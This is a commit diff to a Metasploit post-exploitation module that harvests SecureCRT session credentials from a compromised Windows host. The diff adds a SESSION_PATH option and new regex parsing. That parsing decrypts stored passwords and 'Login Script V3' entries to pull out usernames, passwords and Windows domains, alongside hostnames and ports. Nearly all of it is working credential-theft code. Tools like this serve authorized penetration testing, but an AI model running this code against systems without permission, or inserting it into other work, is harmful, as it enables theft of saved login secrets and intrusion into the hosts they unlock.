Check that the folder does not exist
This commit is contained in:
cn-kali-team
@@ -33,6 +33,7 @@ class MetasploitModule < Msf::Post
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PASSPHRASE', [ false, 'The configuration password that was set when SecureCRT was installed, if one was supplied']),
|
||||
OptString.new('SESSION_PATH', [ false, 'Specifies the session directory path for SecureCRT']),
|
||||
]
|
||||
)
|
||||
end
|
||||
@@ -73,13 +74,24 @@ class MetasploitModule < Msf::Post
|
||||
end
|
||||
|
||||
file = try_encode_file(file_contents)
|
||||
protocol = Regexp.compile('S:"Protocol Name"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
|
||||
hostname = Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
|
||||
password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
|
||||
passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
|
||||
protocol = Regexp.compile('S:"Protocol Name"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
|
||||
hostname = Regexp.compile('S:"Hostname"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
|
||||
decrypted_script = Regexp.compile('S:"Login Script V3"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
|
||||
if !decrypted_script.nil?
|
||||
username = decrypted_script.match(/login name:\x1F(\S+)\x1F0\x1Fpass/u)[1]
|
||||
password = decrypted_script.match(/password:\x1F([\S]+)\x1F0/u)[1]
|
||||
domain = decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u) ? decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u)[1] : nil
|
||||
if !domain.nil?
|
||||
username = domain + '\\' + username
|
||||
end
|
||||
else
|
||||
password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
|
||||
passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
|
||||
username = Regexp.compile('S:"Username"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
|
||||
end
|
||||
|
||||
port = Regexp.compile("D:\"\\\[#{protocol}\\\] Port\"=([0-9a-f]{8})").match(file) ? Regexp.last_match(1).to_i(16).to_s : nil
|
||||
port = Regexp.compile('D:"Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil if !port
|
||||
username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
|
||||
|
||||
tbl << {
|
||||
file_name: item['name'],
|
||||
@@ -159,9 +171,16 @@ class MetasploitModule < Msf::Post
|
||||
|
||||
def run
|
||||
print_status("Gathering SecureCRT session information from #{sysinfo['Computer']}")
|
||||
parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
|
||||
# get session file path
|
||||
securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + 'Sessions')
|
||||
securecrt_path = ''
|
||||
if datastore['SESSION_PATH'].to_s.empty?
|
||||
parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
|
||||
# get session file path
|
||||
root_path = registry_getvaldata(parent_key, 'Config Path')
|
||||
securecrt_path = expand_path(root_path + session.fs.file.separator + 'Sessions') if !root_path.nil?
|
||||
else
|
||||
securecrt_path = expand_path(datastore['SESSION_PATH'])
|
||||
end
|
||||
|
||||
if securecrt_path.to_s.empty?
|
||||
print_error('Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
|
||||
else
|
||||
|
||||
Reference in New Issue
Block a user